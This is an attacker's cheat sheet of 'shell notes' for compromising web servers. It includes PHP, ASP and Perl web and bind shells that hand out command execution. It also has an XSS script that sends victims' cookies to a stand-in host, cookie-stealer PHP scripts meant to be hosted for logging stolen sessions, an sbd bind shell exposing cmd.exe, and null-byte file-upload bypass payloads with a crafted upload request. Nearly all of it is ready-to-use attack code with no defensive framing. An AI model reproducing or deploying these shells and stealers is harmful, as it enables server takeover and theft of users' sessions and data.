Just some simple shell notes:

Image inclusion
php (serverside - local/remote)
- will parse comments in jpegs during file inclusions/requires
IE (clientside - local)
- will parse files contents of images

PNG Headers

\x89\x50\x4e\x47\x0d\x0a\x1a\x0a <=png Header
\x00\x00\x00\x0d <= Chunksize
\x77\x6f\x6f\x74 <= Chunkid "Woot"
\x00\x00\x00\x01 <= Height
\x00\x00\x00\x01 <= Width

Comment writers for jpegs
edjpgcom

Basic php shell

<?php
ob_clean();
system("[command]");
die();
?>

Using Echo
For windows:
echo: ^(carrots) are the escape sequence for systemIO redirects.

echo ^<html^>^<body^>whatever^</body^>^</html^> > file.ext

unix:
write lol from echo with hex (no newline) to file

echo -en "\x6c\x6f\x6c" > file.ext

SBD (netcat style):
File Recieving
sbd -lvp 1234 < NUL > outfile.ext
Banner Grabbing
sbd -c off -v www.microsoft.com 80
Binding Shell
sbd -lp 4337 -e "cmd.exe /K echo p0wn3d-sh3ll"

although plink -raw and telnet are not as good they can work.

Play with Cookies

Simple cookie push

<script>
window.location = 'http://someplace.com/stealer.php?cookie=' + document.cookie;
</script>

Cookie View

Javascript:alert(document.cookie);

Manipulate Cookie

Javascript:void(document.cookie=“variable=value”);

stealer.php

<?php
/*Ethernets Cookie Stealer */
/*Put this up on your free site */
$cookie = $_GET['cookie'];
$log = fopen("cookies11.txt","a");
fwrite($log, $cookie ."\n");
fclose($log);
?>

Other stealers

<?php // line 1
$cookie = $_GET["c"]; // line 2
$file = fopen('000.txt', 'a'); // line 3
fwrite($file, $cookie . "\n\n"); // line 4

global $Redirect;
$Redirect = getenv("HTTP_REFERER");
echo getenv("HTTP_REFERER");

echo "<script>window.location.replace('".$Redirect."')</script>";
?>

Perl shell

#!/usr/bin/perl
use Socket;
$port=911;
$proto=getprotobyname('tcp');
$system='cmd.exe';
socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
for(;$paddr=accept(CLIENT, SERVER);close CLIENT) {
open(STDIN, ">&CLIENT");
open(STDOUT, ">&CLIENT");
open(STDERR, ">&CLIENT");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
}

ASP Quicky whoami ?

<%
Dim wShell, objNetwork
response.write "Shell Test.."
Set objNetwork = server.CreateObject("WScript.Network")
response.write objNetwork.UserName
set objNetwork = nothing
%>

ASP Shell
- WshShell.Exec error '80070005' likely

<%
Dim wshell, intReturn
set wshell = server.createobject("wscript.shell")
intReturn = wshell.run("%comspec% /c dir *.* > c:\test.txt", 0, True)
Response.Write( intReturn )
set wshell = nothing
%>

Curl into older PHP servers from chroot skeletons.

<?php
$ch=curl_init();
curl_setopt($ch, CURLOPT_URL, "http://www.proveyourworth.net/do_not_render.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
print_r(curl_getinfo($ch));
$file=curl_exec($ch);

$PATH = '/home/httpd/vhosts/someplace.com/httpdocs/';
echo '<br>Post Curl<br>';
//echo $file;
$data = $file;

print $data;
?>

Null Bytes
PHP garbage
The null byte is represented with '%00' in php
C:\c99.php%00.jpg

CGI null byte stuff too..
see... php null byte

ASP null byte
When a filename is sent using a multipart/form-data post the null byte will be
included in the filename variable, thus affecting calls to the FileSystemObject.

POST /upload_exploit.asp HTTP/1.0
Content-Type: multipart/form-data; boundary=---------------------------
AAAAAAAAAAAAA
Host: localhost
Content-Length: 4337
Pragma: no-cache
Cookie: ASPSESSIONID=NOTQUITERANDOM
-----------------------------AAAAAAAAAAAAA
Content-Disposition: form-data; name="ExploitFile"; filename="c:\sbd.exe .png"
Content-Type: text/plain
-----------------------------AAAAAAAAAAAAA
Content-Disposition: form-data; name="submit"
Upload
-----------------------------AAAAAAAAAAAAA